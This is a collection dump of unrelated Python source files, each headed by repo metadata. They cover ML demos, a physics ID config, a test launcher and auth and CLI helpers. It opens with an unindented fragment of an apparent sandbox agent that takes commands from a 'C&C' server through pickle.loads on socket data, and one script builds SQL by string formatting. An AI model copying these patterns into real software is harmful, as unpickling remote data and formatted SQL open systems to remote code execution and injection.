if DEBUG: print "FullPath: {}".format(full_path)
file_name = os.path.basename(full_path)
if DEBUG: print "FileName: {}".format(file_name)
index = full_path.split('\\').index(tool_name)
if DEBUG: print "Index: {}".format(index)
path_found = "/".join([x for x in full_path.split('\\')[index+1:]])
if DEBUG: print "PathFound: {}".format(path_found)
if path_found.count('/') == 0:
# Tool log file was found (e.g. bintext.log)
if DEBUG: print "Found log file: {}".format(path_found)
if path_found.endswith('.log'):
if DEBUG: print "FullPath: {}".format(full_path)
file_and_path_found = [full_path, path_found, '/']
files_found.append(file_and_path_found)
else:
# Any file inside of the /files/ folder.
if DEBUG: print "Found non-log file: {}".format(path_found)
                            # For non-log files, a zipped version of the file is generated
                            # due to problems uploading big files over HTTP. This is a temporary fix.
zip_filename = File().zip_file(full_path)
file_and_path_found = zip_filename.split() + \
path_found.split('/')[:-1]
if DEBUG: print file_and_path_found
file_and_path_found.insert(
0, full_path.replace(file_name, zip_filename))
if file_and_path_found not in files_found:
if DEBUG: print "Appending file found: {}".format(file_and_path_found)
files_found.append(file_and_path_found)
if DEBUG: print "FullPathFound: {}".format(file_and_path_found)
if DEBUG: print "Files Found: {}".format(files_found)
return list(files_found)
else:
if DEBUG: print "Waiting for files to appear..."
time.sleep(1)
def report(self, template):
def filter_dir(unfiltered_dir):
if DEBUG: print "Unfiltered dir: {}".format(unfiltered_dir)
dir_path = "/".join(unfiltered_dir)
if dir_path.startswith('/'):
return unfiltered_dir[0]
return "/{}".format(dir_path)
report_data = {}
if os.path.isdir(self.report_path):
if DEBUG: print "Sending back results to C&C server..."
# Request variables. Generate data on the server.
report_data['project_name'] = template.project_name
report_data['md5'] = template.md5
report_data['sid'] = template.sid
report_data['rid'] = template.rid
report_data['tool_name'] = template.tool_name
for file_found in self.report_files(self.report_path,
template.tool_name):
# if DEBUG: print "FileFound: {}".format(file_found)
report_data['file_abs_path'] = file_found[0]
report_data['file'] = urllib.quote(file_found[1], safe='')
report_data['dir'] = filter_dir(file_found[2:])
if DEBUG: print report_data
self.report_back(report_data)
if DEBUG: print "Done."
else:
if DEBUG: print "Report Directory ({}) does not exist".format(self.report_path)
def report_directory_check(self, vm_report_name):
report_path = os.path.join(APP_DATA, vm_report_name)
if DEBUG:
print report_path
if not os.path.isdir(report_path):
os.mkdir(report_path)
            self.report_directory_check(vm_report_name)
else:
REPORT_PATH = report_path
class Agent:
RETRY_SECS = 1
BUFFER_SIZE = 16384
def __init__(self):
self.connection_status = False
#### Agent Control Functions ####
def start(self):
print "Starting Agent..."
# Connect to Server
self.connect()
def stop(self):
print "Stopping Agent..."
self.disconnect()
self.connection_status = False
def restart(self):
self.stop()
self.start()
#### Agent Connection Functions ####
def check_connection(self):
pass
# print dir(self._clientsocket)
def is_connected(self):
        return self.connection_status
def send(self, data):
print "Sending Data: {}".format(data)
try:
self._clientsocket.send(data)
except:
self.reconnect()
def listen(self):
print "Connected to C&C Template Server. Waiting for instructions..."
try:
while True:
                # Keeps receiving data. Once received, it is automatically
                # un-serialized and converted into a Python dictionary object.
serialized_data = pickle.loads(self._clientsocket.recv(self.BUFFER_SIZE))
template_data = box.Box(serialized_data)
                # TemplateManager decomposes the serialized data
                # and takes actions to execute the selected program
TemplateManager(template_data)
print "Sending back to C&C => OK status"
self.send('ok')
except socket.error as e:
print "Server disconnection: {}".format(e)
self.reconnect()
except EOFError as e:
print "Server disconnection...".format(e)
self.reconnect()
else:
# If template data was received correctly, then acknowledge.
self.send('skip')
def connect(self):
# Make the connection to the server
print "Connecting to C&C Template Server: {}:{}".format(BPH_TEMPLATE_SERVER_IP, BPH_TEMPLATE_SERVER_PORT)
try:
# Initialize Socket & connect back to server.
self._clientsocket = socket.socket()
self._clientsocket.connect((BPH_TEMPLATE_SERVER_IP, BPH_TEMPLATE_SERVER_PORT))
self._clientsocket.setblocking(1)
except socket.error:
self.reconnect()
except KeyboardInterrupt:
print "Interrupting execution."
sys.exit()
else:
print "Connection established. "
self.connection_status = True
self.listen()
def disconnect(self):
self._clientsocket.close()
def reconnect(self):
print "Reconnecting...."
if DEBUG: print "Connection Error. Server down? Attempting connection in: ({}) seconds".format(self.RETRY_SECS)
time.sleep(self.RETRY_SECS)
if DEBUG: print "Attempting now..."
self.connect()
if __name__ == "__main__":
agent = Agent()
try:
agent.start()
while True:
# agent.check_connection()
if not agent.is_connected():
# If agent stops. Start it again.
agent.start()
except KeyboardInterrupt:
print "Manual interruption. Bye!"
sys.exit()
| 2.34375 | 2 |
python/src/learn/lstmSequence.py | kakaba2009/MachineLearning | 0 | 11387 | # LSTM with Variable Length Input Sequences to One Character Output
import numpy
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM
from keras.utils import np_utils
from keras.preprocessing.sequence import pad_sequences
from theano.tensor.shared_randomstreams import RandomStreams
# fix random seed for reproducibility
numpy.random.seed(7)
# define the raw dataset
alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
# create mapping of characters to integers (0-25) and the reverse
char_to_int = dict((c, i) for i, c in enumerate(alphabet))
int_to_char = dict((i, c) for i, c in enumerate(alphabet))
# prepare the dataset of input to output pairs encoded as integers
num_inputs = 16
max_len = 5
dataX = []
dataY = []
for i in range(num_inputs):
start = numpy.random.randint(len(alphabet)-2)
end = numpy.random.randint(start, min(start+max_len,len(alphabet)-1))
sequence_in = alphabet[start:end+1]
sequence_out = alphabet[end + 1]
dataX.append([char_to_int[char] for char in sequence_in])
dataY.append(char_to_int[sequence_out])
print( sequence_in, '->', sequence_out )
# convert list of lists to array and pad sequences if needed
X = pad_sequences(dataX, maxlen=max_len, dtype='float32')
# reshape X to be [samples, time steps, features]
X = numpy.reshape(X, (X.shape[0], max_len, 1))
# normalize
X = X / float(len(alphabet))
# one hot encode the output variable
y = np_utils.to_categorical(dataY)
# create and fit the model
batch_size = 1
model = Sequential()
model.add(LSTM(16, batch_input_shape=(batch_size, X.shape[1], X.shape[2]), stateful=True))
model.add(Dense(y.shape[1], activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
for i in range(1):
model.fit(X, y, nb_epoch=1, batch_size=batch_size, verbose=2, shuffle=False)
model.reset_states()
# summarize performance of the model
scores = model.evaluate(X, y, batch_size=batch_size, verbose=0)
model.reset_states()
print("Model Accuracy: %.2f%%" % (scores[1]*100))
# demonstrate some model predictions
for i in range(1):
pattern_index = numpy.random.randint(len(dataX))
pattern = dataX[pattern_index]
x = pad_sequences([pattern], maxlen=max_len, dtype='float32')
x = numpy.reshape(x, (1, max_len, 1))
x = x / float(len(alphabet))
prediction = model.predict(x, verbose=0)
index = numpy.argmax(prediction)
result = int_to_char[index]
seq_in = [int_to_char[value] for value in pattern]
print( seq_in, "->", result )
| 2.9375 | 3 |
DATA/prediction/direction/pred_script.py | korcsmarosgroup/ARN2DataBase | 0 | 11388 | """
Direction prediction based on learning dataset from reactome
PPI direction calculated from domain interaction directions
"""
# Imports
import sqlite3, csv, os
import pandas as pd
import logging
import pickle
# # Initiating logger
# logger = logging.getLogger()
# handler = logging.FileHandler('../../workflow/SLK3.log')
# logger.setLevel(logging.DEBUG)
# handler.setLevel(logging.DEBUG)
# formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# handler.setFormatter(formatter)
# logger.addHandler(handler)
class DirScore:
def __init__(self):
# Defining constants
self.REACTOME_DB = '../../SLKlib/mapper/protein/output/reactome_mapped.db'
self.PFAM_FILE = ['../prediction/direction/files/uniprot-pfam_human.tab',
'../prediction/direction/files/uniprot-pfam_drosi.tab',
'../prediction/direction/files/uniprot-pfam_danio.tab',
'../prediction/direction/files/uniprot-pfam_celegans.tab']
logging.basicConfig(level=logging.DEBUG)
self.pfam_dict = {}
self.dir_score_dict = {}
        # Adding the two output dictionaries of the test_scores function to a pickle file
        # so that the next function can access them between script executions
# TODO: remove pickle files after each run
self.PICKLE_FILE = 'dir_score.pickle'
if os.path.isfile(self.PICKLE_FILE):
self.pfam_dict, self.dir_score_dict = pickle.load(open(self.PICKLE_FILE, 'rb'))
else:
self.test_scores()
pickle.dump((self.pfam_dict, self.dir_score_dict), open(self.PICKLE_FILE, 'wb'))
def test_scores(self):
# Setting as global so next script can access it
df_all = pd.DataFrame(columns=['a_dom', 'b_dom'])
conn = sqlite3.connect(self.REACTOME_DB)
# Setting up learning data set
logging.debug("Started connection to reactome dataset")
for inpfam in self.PFAM_FILE:
with open(inpfam) as infile:
infile.readline()
for line in infile:
line = line.strip().split('\t')
if len(line) == 4:
self.pfam_dict[line[0]] = line[3].split(';')[0:-1]
with conn:
c = conn.cursor()
counter = 0
# Getting PPI data
logging.debug('Getting PPI data')
c.execute("SELECT interactor_a_node_name, interactor_b_node_name FROM edge")
while True:
row = c.fetchone()
counter += 1
if row is None:
break
else:
a_node = row[0].split(':')[1]
b_node = row[1].split(':')[1]
if a_node not in self.pfam_dict or b_node not in self.pfam_dict:
continue
int_list = [self.pfam_dict[a_node], self.pfam_dict[b_node]]
for id1, id2 in zip(int_list[0], int_list[1]):
# Setting up dataframe for all domain-domain interactions
                        # len(df_all) sets the index label of the newly appended row
df_all = df_all.set_value(len(df_all), col=['a_dom', 'b_dom'], value=[id1, id2])
# All domains in a dataframe, without direction
all_domain_df = df_all['a_dom'].append(df_all['b_dom']).reset_index(name='domain')
all_count = all_domain_df.groupby('domain').size().reset_index(name='counter')
# Getting probability of each domain
# Number of domain occurrence / Number of all domains
logging.debug('Getting probability of each domain')
prob_dom = {}
# Number of all domain occurrences
total_occurrence = all_count['counter'].sum()
# Iterating over domains
for index, domain in all_count['domain'].iteritems():
dom_count = all_count.loc[all_count['domain'] == domain, 'counter'].iloc[0]
P_domain = dom_count / total_occurrence
# Adding data into a dictionary
prob_dom[domain] = P_domain
#print(domain, P_domain)
# Getting directed domain-domain interaction probabilities
# Number of directed DDI / number of all DDIs
logging.debug('Getting DDI probabilities')
prob_inter = {}
# Getting the occurrences for each directed interaction
all_inter_counted = df_all.groupby(['a_dom', 'b_dom']).size().reset_index(name='counter')
all_inter_counter = all_inter_counted['counter'].sum()
# Iterating over interactions
for index2, count in all_inter_counted['counter'].iteritems():
P_inter = count / all_inter_counter
# Getting domain ids
a_dom = all_inter_counted.loc[all_inter_counted['counter'] == count, 'a_dom'].iloc[0]
b_dom = all_inter_counted.loc[all_inter_counted['counter'] == count, 'b_dom'].iloc[0]
                # Adding the result into a dictionary
prob_inter['->'.join((a_dom, b_dom))] = P_inter
# Calculating direction score
# (P_AtoB - P_BtoA) / P_A * P_B
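            # Hedged, purely illustrative numbers (not taken from the Reactome data):
            # with P(A->B) = 0.004, P(B->A) = 0.001, P(A) = 0.02 and P(B) = 0.05 the
            # expression below evaluates as ((0.004 - 0.001) / 0.02) * 0.05 = 0.0075,
            # i.e. a positive score favouring the A->B direction; swapping the two
            # interaction probabilities flips the sign.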
logging.debug('Calculating direction scores')
for key in prob_inter.keys():
a = key.split('->')[0]
b = key.split('->')[1]
other_dir = '->'.join((b, a))
if other_dir in prob_inter.keys():
dir_score = (prob_inter[key] - prob_inter[other_dir]) / prob_dom[a] * prob_dom[b]
self.dir_score_dict[key] = dir_score
else:
dir_score = (prob_inter[key] - 0) / prob_dom[a] * prob_dom[b]
self.dir_score_dict[key] = dir_score
#print(key, dir_score)
#return self.dir_score_dict, self.pfam_dict
# LAYER 3
def apply_to_db(self):
#logger.debug(self.pfam_dict)
#logger.debug(self.dir_score_dict)
conn2 = sqlite3.connect('SLK3_layers.db')
# logger.debug("Connected to '%s" % conn2)
with conn2:
c2 = conn2.cursor()
c22 = conn2.cursor()
c2.execute("SELECT interactor_a_node_name, interactor_b_node_name FROM ATG_Reg")
while True:
row = c2.fetchone()
if row is None:
break
else:
prot_a = row[0].split(':')[1]
prot_b = row[1].split(':')[1]
dir_score_sum = 0
# Summing DDI scores
#logging.debug('Summing DDI scores')
if prot_a in self.pfam_dict.keys() and prot_b in self.pfam_dict.keys():
for dom_a, dom_b in zip(self.pfam_dict[prot_a], self.pfam_dict[prot_b]):
#print(dir_score_dict['->'.join((dom_a, dom_b))])
if '->'.join((dom_a, dom_b)) in self.dir_score_dict.keys():
dir_score_sum += self.dir_score_dict['->'.join((dom_a, dom_b))]
                        # To get the final direction score of an unknown PPI we calculate
                        # the average over all of the two proteins' domain interaction scores
if len(self.pfam_dict[prot_a]) * len(self.pfam_dict[prot_b]) == 0:
logging.debug(prot_a, len(self.pfam_dict[prot_a]), prot_b, len(self.pfam_dict[prot_b]))
continue
else:
dir_score_final_PPI = dir_score_sum / (len(self.pfam_dict[prot_a]) * len(self.pfam_dict[prot_b]))
#logging.debug("Updating scores")
c22.execute("UPDATE ATG_Reg SET confidence_scores = '%s' "
"WHERE ATG_Reg.interactor_a_node_name = '%s' AND ATG_Reg.interactor_b_node_name = '%s'"
% ('|dir_pred:' + str(dir_score_final_PPI), row[0], row[1]))
if __name__ == '__main__':
    test = DirScore()
    logging.debug('Creating test set')
    test.test_scores()
    logging.debug('Adding scores to dataset')
    test.apply_to_db()
    logging.debug('Direction prediction done')
| 2.296875 | 2 |
src/main.py | vcodrins/json_to_folder | 0 | 11389 | import json
import os.path
import sys
from exceptions import *
from create_folder_structure import create_folder_structure
def main():
try:
if len(sys.argv) != 3:
raise InvalidArgumentCount
if not os.path.exists(sys.argv[2]):
raise InvalidFilePath
if not os.path.exists(sys.argv[1]):
raise InvalidFolderPath
try:
json_object = json.load(open(sys.argv[2]))
except ValueError:
raise InvalidJsonFile
output_folder = sys.argv[1]
create_folder_structure(output_folder, json_object)
except InvalidArgumentCount:
print("""
Invalid number of arguments
Please make sure to use quotes for outputFolder and jsonFile if path includes spaces
Valid paths may be:
"file.json"
"./file.json"
"folder/file.json"
"./folder/file.json"
"absolute/path/to/file.json"
Usage:
main.py "<outputFolder>" "<jsonFile>"
""")
except InvalidFolderPath:
print("""
Output folder does not exist
""")
except InvalidFilePath:
print("""
Input json file does not exist
""")
except InvalidJsonFile:
print("""
Input json file is invalid
""")
main()
| 3.703125 | 4 |
app/conftest.py | hbyyy/newsmailing | 0 | 11390 | <gh_stars>0
from datetime import timedelta
import pytest
from model_bakery import baker
@pytest.fixture()
def create_expire_user():
def make_user(**kwargs):
user = baker.make('members.User')
user.created -= timedelta(days=4)
return user
return make_user
| 2.078125 | 2 |
src/SecurityDecorator.py | JanCwik/SoftwarePraktikum | 7 | 11391 | from flask import request
from google.auth.transport import requests
import google.oauth2.id_token
from server.ApplikationsAdministration import ApplikationsAdministration
# Benutzer.py, BenutzerMapper + Benutzer methods in ApplikationsAdministration
def secured(function):
"""Decorator zur Google Firebase-basierten Authentifizierung von Benutzern
Da es sich bei diesem System um eine basale Fallstudie zu Lehrzwecken handelt, wurde hier
bewusst auf ein ausgefeiltes Berechtigungskonzept verzichtet. Vielmehr soll dieses Decorator
einen Weg aufzeigen, wie man technisch mit vertretbarem Aufwand in eine Authentifizierung
einsteigen kann.
POLICY: Die hier demonstrierte Policy ist, dass jeder, der einen durch Firebase akzeptierten
Account besitzt, sich an diesem System anmelden kann. Bei jeder Anmeldung werden Klarname,
Mail-Adresse sowie die Google User ID in unserem System gespeichert bzw. geupdated. Auf diese
Weise könnte dann für eine Erweiterung des Systems auf jene Daten zurückgegriffen werden.
"""
firebase_request_adapter = requests.Request()
def wrapper(*args, **kwargs):
# Verify Firebase auth.
id_token = request.cookies.get("token")
error_message = None
claims = None
objects = None
if id_token:
try:
# Verify the token against the Firebase Auth API. This example
# verifies the token on each page load. For improved performance,
# some applications may wish to cache results in an encrypted
# session store (see for instance
# http://flask.pocoo.org/docs/1.0/quickstart/#sessions).
claims = google.oauth2.id_token.verify_firebase_token(
id_token, firebase_request_adapter)
if claims is not None:
adm = ApplikationsAdministration()
google_user_id = claims.get("user_id")
email = claims.get("email")
name = claims.get("name")
user = adm.get_user_by_google_user_id(google_user_id)
                            # Name this as in ApplikationsAdministration
if user is not None:
"""Fall: Der Benutzer ist unserem System bereits bekannt.
Wir gehen davon aus, dass die google_user_id sich nicht ändert.
Wohl aber können sich der zugehörige Klarname (name) und die
E-Mail-Adresse ändern. Daher werden diese beiden Daten sicherheitshalber
in unserem System geupdated."""
user.set_name(name)
user.set_email(email)
adm.update_benutzer(user)
                        # name set_name and set_email as in Benutzer.py
                        # name adm.save_user as in ApplikationsAdministration.py
else:
"""Fall: Der Benutzer war bislang noch nicht eingelogged.
Wir legen daher ein neues User-Objekt an, um dieses ggf. später
nutzen zu können.
"""
user = adm.benutzer_anlegen(name, email, google_user_id)
                        # Name as in ApplikationsAdministration
                    print(request.method, request.path, "requested by:", name, email)
objects = function(*args, **kwargs)
return objects
else:
return '', 401 # UNAUTHORIZED !!!
except ValueError as exc:
# This will be raised if the token is expired or any other
# verification checks fail.
error_message = str(exc)
return exc, 401 # UNAUTHORIZED !!!
return '', 401 # UNAUTHORIZED !!!
return wrapper
| 2.9375 | 3 |
code/django18/django18/newsletter/forms.py | dvl/celerytalk | 0 | 11392 | <reponame>dvl/celerytalk
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django import forms
class NewsletterForm(forms.Form):
assunto = forms.CharField()
mensagem = forms.CharField(widget=forms.Textarea)
| 1.828125 | 2 |
RecoEgamma/ElectronIdentification/python/Identification/mvaElectronID_Fall17_noIso_V1_cff.py | ckamtsikis/cmssw | 852 | 11393 | import FWCore.ParameterSet.Config as cms
from RecoEgamma.ElectronIdentification.Identification.mvaElectronID_tools import *
# Documentation of the MVA
# https://twiki.cern.ch/twiki/bin/viewauth/CMS/MultivariateElectronIdentificationRun2
# https://rembserj.web.cern.ch/rembserj/notes/Electron_MVA_ID_2017_documentation
#
# In this file we define the locations of the MVA weights, cuts on the MVA values
# for specific working points, and configure those cuts in VID
#
# The tag is an extra string attached to the names of the products
# such as ValueMaps that needs to distinguish cases when the same MVA estimator
# class is used with different tuning/weights
mvaTag = "Fall17NoIsoV1"
# There are 6 categories in this MVA. They have to be configured in this strict order
# (cuts and weight files order):
# 0 EB1 (eta<0.8) pt 5-10 GeV | pt < ptSplit && |eta| < ebSplit
# 1 EB2 (eta>=0.8) pt 5-10 GeV | pt < ptSplit && |eta| >= ebSplit && |eta| < ebeeSplit
# 2 EE pt 5-10 GeV | pt < ptSplit && |eta| >= ebeeSplit
# 3 EB1 (eta<0.8) pt 10-inf GeV | pt >= ptSplit && |eta| < ebSplit
# 4 EB2 (eta>=0.8) pt 10-inf GeV | pt >= ptSplit && |eta| >= ebSplit && |eta| < ebeeSplit
# 5 EE pt 10-inf GeV | pt >= ptSplit && |eta| >= ebeeSplit
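# Illustration of the category mapping (split values assumed to be the usual
# ptSplit = 10 GeV, ebSplit = 0.8, ebeeSplit ~= 1.479 used by these MVAs):
# an electron with pt = 20 GeV and |eta| = 1.9 lands in category 5 (EE, high pt),
# while one with pt = 7 GeV and |eta| = 0.5 lands in category 0 (EB1, low pt).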
mvaFall17WeightFiles_V1 = cms.vstring(
"RecoEgamma/ElectronIdentification/data/Fall17/EIDmva_EB1_5_2017_puinfo_BDT.weights.xml.gz",
"RecoEgamma/ElectronIdentification/data/Fall17/EIDmva_EB2_5_2017_puinfo_BDT.weights.xml.gz",
"RecoEgamma/ElectronIdentification/data/Fall17/EIDmva_EE_5_2017_puinfo_BDT.weights.xml.gz",
"RecoEgamma/ElectronIdentification/data/Fall17/EIDmva_EB1_10_2017_puinfo_BDT.weights.xml.gz",
"RecoEgamma/ElectronIdentification/data/Fall17/EIDmva_EB2_10_2017_puinfo_BDT.weights.xml.gz",
"RecoEgamma/ElectronIdentification/data/Fall17/EIDmva_EE_10_2017_puinfo_BDT.weights.xml.gz"
)
## The working point for this MVA that is expected to have about 90% signal
# WP tuned to give about 90 and 80% signal efficiecny for electrons from Drell-Yan with pT > 25 GeV
# The working point for the low pt categories is just taken over from the high pt
idName90 = "mvaEleID-Fall17-noIso-V1-wp90"
MVA_WP90 = EleMVA_WP(
idName = idName90, mvaTag = mvaTag,
cutCategory0 = "0.9165112826974601 - exp(-pt / 2.7381703555094217) * 1.03549199648109", # EB1 low pt
cutCategory1 = "0.8655738322220173 - exp(-pt / 2.4027944652597073) * 0.7975615613282494", # EB2 low pt
cutCategory2 = "-3016.035055227131 - exp(-pt / -52140.61856333602) * -3016.3029387236506", # EE low pt
cutCategory3 = "0.9616542816132922 - exp(-pt / 8.757943837889817) * 3.1390200321591206", # EB1
cutCategory4 = "0.9319258011430132 - exp(-pt / 8.846057432565809) * 3.5985063793347787", # EB2
cutCategory5 = "0.8899260780999244 - exp(-pt / 10.124234115859881) * 4.352791250718547", # EE
)
idName80 = "mvaEleID-Fall17-noIso-V1-wp80"
MVA_WP80 = EleMVA_WP(
idName = idName80, mvaTag = mvaTag,
cutCategory0 = "0.9530240956555949 - exp(-pt / 2.7591425841003647) * 0.4669644718545271", # EB1 low pt
cutCategory1 = "0.9336564763961019 - exp(-pt / 2.709276284272272) * 0.33512286599215946", # EB2 low pt
cutCategory2 = "0.9313133688365339 - exp(-pt / 1.5821934800715558) * 3.8889462619659265", # EE low pt
cutCategory3 = "0.9825268564943458 - exp(-pt / 8.702601455860762) * 1.1974861596609097", # EB1
cutCategory4 = "0.9727509457929913 - exp(-pt / 8.179525631018565) * 1.7111755094657688", # EB2
cutCategory5 = "0.9562619539540145 - exp(-pt / 8.109845366281608) * 3.013927699126942", # EE
)
### WP tuned for HZZ analysis with very high efficiency (about 98%)
# The working points were found by requiring the same signal efficiencies in
# each category as for the Spring 16 HZZ ID
# (see RecoEgamma/ElectronIdentification/python/Identification/mvaElectronID_Spring16_HZZ_V1_cff.py)
idNamewpLoose = "mvaEleID-Fall17-noIso-V1-wpLoose"
MVA_WPLoose = EleMVA_WP(
idName = idNamewpLoose, mvaTag = mvaTag,
cutCategory0 = "-0.13285867293779202", # EB1 low pt
cutCategory1 = "-0.31765300958836074", # EB2 low pt
cutCategory2 = "-0.0799205914718861" , # EE low pt
cutCategory3 = "-0.856871961305474" , # EB1
cutCategory4 = "-0.8107642141584835" , # EB2
cutCategory5 = "-0.7179265933023059" # EE
)
#
# Finally, set up VID configuration for all cuts
#
# Create the PSet that will be fed to the MVA value map producer
mvaEleID_Fall17_noIso_V1_producer_config = cms.PSet(
mvaName = cms.string(mvaClassName),
mvaTag = cms.string(mvaTag),
# Category parameters
nCategories = cms.int32(6),
categoryCuts = cms.vstring(*EleMVA_6CategoriesCuts),
# Weight files and variable definitions
weightFileNames = mvaFall17WeightFiles_V1,
variableDefinition = cms.string("RecoEgamma/ElectronIdentification/data/ElectronMVAEstimatorRun2Fall17V1Variables.txt")
)
# Create the VPset's for VID cuts
mvaEleID_Fall17_V1_wpLoose = configureVIDMVAEleID( MVA_WPLoose )
mvaEleID_Fall17_V1_wp90 = configureVIDMVAEleID( MVA_WP90 )
mvaEleID_Fall17_V1_wp80 = configureVIDMVAEleID( MVA_WP80 )
mvaEleID_Fall17_V1_wpLoose.isPOGApproved = cms.untracked.bool(True)
mvaEleID_Fall17_V1_wp90.isPOGApproved = cms.untracked.bool(True)
mvaEleID_Fall17_V1_wp80.isPOGApproved = cms.untracked.bool(True)
| 1.75 | 2 |
dqn_plus/notebooks/code/train_ram.py | hadleyhzy34/reinforcement_learning | 0 | 11394 | <reponame>hadleyhzy34/reinforcement_learning<gh_stars>0
import numpy as np
import gym
from utils import *
from agent import *
from config import *
def train(env, agent, num_episode, eps_init, eps_decay, eps_min, max_t):
rewards_log = []
average_log = []
eps = eps_init
for i in range(1, 1 + num_episode):
episodic_reward = 0
done = False
state = env.reset()
t = 0
while not done and t < max_t:
t += 1
state = state.reshape(1, -1)
action = agent.act(state, eps)
next_state, reward, done, _ = env.step(action)
agent.memory.remember(state, action, reward, next_state, done)
if t % 4 == 0 and len(agent.memory) >= agent.bs:
agent.learn()
agent.soft_update(agent.tau)
state = next_state.copy()
episodic_reward += reward
rewards_log.append(episodic_reward)
average_log.append(np.mean(rewards_log[-100:]))
print('\rEpisode {}, Reward {:.3f}, Average Reward {:.3f}'.format(i, episodic_reward, average_log[-1]), end='')
if i % 100 == 0:
print()
eps = max(eps * eps_decay, eps_min)
return rewards_log, average_log
if __name__ == '__main__':
env = gym.make(RAM_ENV_NAME)
agent = Agent(env.observation_space.shape[0], env.action_space.n, BATCH_SIZE, LEARNING_RATE, TAU, GAMMA, DEVICE, False, DUEL, DOUBLE, PRIORITIZED)
rewards_log, _ = train(env, agent, RAM_NUM_EPISODE, EPS_INIT, EPS_DECAY, EPS_MIN, MAX_T)
np.save('{}_rewards.npy'.format(RAM_ENV_NAME), rewards_log)
agent.Q_local.to('cpu')
torch.save(agent.Q_local.state_dict(), '{}_weights.pth'.format(RAM_ENV_NAME)) | 2.5625 | 3 |
tools/parallel_launcher/parallel_launcher.py | Gitman1989/chromium | 2 | 11395 | #!/usr/bin/python
# Copyright (c) 2010 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
This tool launches several shards of a gtest-based binary
in parallel on a local machine.
Example usage:
parallel_launcher.py path/to/base_unittests
"""
import optparse
import os
import subprocess
import sys
import threading
import time
def StreamCopyWindows(stream_from, stream_to):
"""Copies stream_from to stream_to."""
while True:
buf = stream_from.read(1024)
if not buf:
break
stream_to.write(buf)
stream_to.flush()
def StreamCopyPosix(stream_from, stream_to, child_exited):
"""
Copies stream_from to stream_to, and exits if child_exited
is signaled.
"""
import fcntl
# Put the source stream in a non-blocking mode, so we can check
# child_exited when there is no data.
fd = stream_from.fileno()
fl = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
while True:
try:
buf = os.read(fd, 1024)
except OSError, e:
if e.errno == 11:
if child_exited.isSet():
break
time.sleep(0.1)
continue
raise
if not buf:
break
stream_to.write(buf)
stream_to.flush()
class TestLauncher(object):
def __init__(self, args, executable, num_shards, shard):
self._args = args
self._executable = executable
self._num_shards = num_shards
self._shard = shard
self._test = None
def launch(self):
env = os.environ.copy()
env['CHROME_LOG_FILE'] = 'chrome_log_%d' % self._shard
if 'GTEST_TOTAL_SHARDS' in env:
# Handle the requested sharding transparently.
outer_shards = int(env['GTEST_TOTAL_SHARDS'])
outer_index = int(env['GTEST_SHARD_INDEX'])
env['GTEST_TOTAL_SHARDS'] = str(self._num_shards * outer_shards)
# Calculate the right shard index to pass to the child. This is going
# to be a shard of a shard.
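      # Hedged numeric illustration (made-up values): with an outer request of
      # GTEST_TOTAL_SHARDS=2 and GTEST_SHARD_INDEX=1, running with --shards=3
      # for local shard 2 gives the child GTEST_TOTAL_SHARDS = 3 * 2 = 6 and
      # GTEST_SHARD_INDEX = 3 * 1 + 2 = 5.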
env['GTEST_SHARD_INDEX'] = str((self._num_shards * outer_index) +
self._shard)
else:
env['GTEST_TOTAL_SHARDS'] = str(self._num_shards)
env['GTEST_SHARD_INDEX'] = str(self._shard)
args = self._args + ['--test-server-shard=' + str(self._shard)]
self._test = subprocess.Popen(args=args,
executable=self._executable,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env)
def wait(self):
if subprocess.mswindows:
stdout_thread = threading.Thread(
target=StreamCopyWindows,
args=[self._test.stdout, sys.stdout])
stdout_thread.start()
code = self._test.wait()
stdout_thread.join()
return code
else:
child_exited = threading.Event()
stdout_thread = threading.Thread(
target=StreamCopyPosix,
args=[self._test.stdout, sys.stdout, child_exited])
stdout_thread.start()
code = self._test.wait()
child_exited.set()
stdout_thread.join()
return code
def main(argv):
parser = optparse.OptionParser()
parser.add_option("--shards", type="int", dest="shards", default=10)
# Make it possible to pass options to the launched process.
# Options for parallel_launcher should be first, then the binary path,
# and finally - optional arguments for the launched binary.
parser.disable_interspersed_args()
options, args = parser.parse_args(argv)
if not args:
print 'You must provide path to the test binary'
return 1
env = os.environ
if bool('GTEST_TOTAL_SHARDS' in env) != bool('GTEST_SHARD_INDEX' in env):
print 'Inconsistent environment. GTEST_TOTAL_SHARDS and GTEST_SHARD_INDEX'
print 'should either be both defined, or both undefined.'
return 1
launchers = []
for shard in range(options.shards):
launcher = TestLauncher(args, args[0], options.shards, shard)
launcher.launch()
launchers.append(launcher)
return_code = 0
for launcher in launchers:
if launcher.wait() != 0:
return_code = 1
return return_code
if __name__ == "__main__":
sys.exit(main(sys.argv[1:]))
| 2.46875 | 2 |
05_Practice1/Step06/yj.py | StudyForCoding/BEAKJOON | 0 | 11396 | a = int(input())
for i in range(a):
print('* '*(a-a//2))
print(' *'*(a//2)) | 3.53125 | 4 |
greydot/errors.py | TralahM/greydot-api | 0 | 11397 | <gh_stars>0
class NoMessageRecipients(Exception):
"""
Raised when Message Recipients are not specified.
"""
pass
class InvalidAmount(Exception):
"""
Raised when an invalid currency amount is specified
"""
pass
| 1.757813 | 2 |
ginga/util/dp.py | kyraikeda/ginga | 76 | 11398 | <gh_stars>10-100
#
# dp.py -- Data pipeline and reduction routines
#
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
import numpy as np
from collections import OrderedDict
from ginga import AstroImage, colors
from ginga.RGBImage import RGBImage
from ginga.util import wcs
# counter used to name anonymous images
prefixes = dict(dp=0)
def get_image_name(image, pfx='dp'):
global prefixes
name = image.get('name', None)
if name is None:
if pfx not in prefixes:
prefixes[pfx] = 0
name = '{0}{1:d}'.format(pfx, prefixes[pfx])
prefixes[pfx] += 1
image.set(name=name)
return name
def make_image(data_np, oldimage, header, pfx='dp'):
# Prepare a new image with the numpy array as data
image = AstroImage.AstroImage()
image.set_data(data_np)
# Set the header to be the old image header updated
# with items from the new header
oldhdr = oldimage.get_header()
oldhdr.update(header)
image.update_keywords(oldhdr)
# give the image a name
get_image_name(image, pfx=pfx)
return image
